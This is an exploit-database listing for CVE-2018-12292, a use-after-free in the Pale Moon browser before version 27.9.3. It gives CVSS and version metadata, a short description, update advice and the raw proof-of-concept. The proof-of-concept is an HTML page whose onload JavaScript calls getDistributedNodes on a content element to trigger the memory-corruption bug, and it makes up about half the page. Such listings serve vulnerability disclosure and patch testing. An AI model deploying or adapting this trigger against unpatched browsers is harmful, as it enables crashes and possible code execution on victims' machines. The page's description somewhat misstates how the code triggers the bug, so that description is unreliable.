header-logo
Suggest Exploit
vendor:
Pale Moon
by:
Berk Cem Goksel
9.8
CVSS
CRITICAL
Use After Free
416
CWE
Product Name: Pale Moon
Affected Version From: 27.9.0
Affected Version To: 27.9.2
Patch Exists: YES
Related CWE: CVE-2018-12292
CPE: a:moonchild_productions:pale_moon
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

Pale Moon Browser < 27.9.3 - Use After Free (PoC)

This exploit is a proof of concept for a Use After Free vulnerability in Pale Moon Browser versions prior to 27.9.3. The vulnerability is triggered when the SetVariable() function is called with a NodeList object as the first argument. This causes a Use After Free condition, which can be used to execute arbitrary code.

Mitigation:

Users should update to the latest version of Pale Moon Browser (27.9.3 or later) to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC) 
# Date: 2018-06-13
# Author - Berk Cem Goksel  
# Vendor Homepage: https://www.palemoon.org/ 
# Software Link: https://www.palemoon.org/palemoon-win32.shtml 
# Version:  Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2)  
# Tested on: Windows 10 
# Category: Windows Remote Exploit 
# CVE : CVE-2018-12292 


<html>
<head>
<style>
</style>
<script>

function SetVariable(fuzzervars, var_name, var_type) { 
fuzzervars[var_type] = var_name;
 }

function jsfuzzer() {

var var_1 = var_2.getDistributedNodes();
SetVariable(var_1, 'NodeList'); 

}


</script>
</head>
<body onload=jsfuzzer()>
<!-- beginhtml -->
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content>
<!-- endhtml -->
</body>
</html>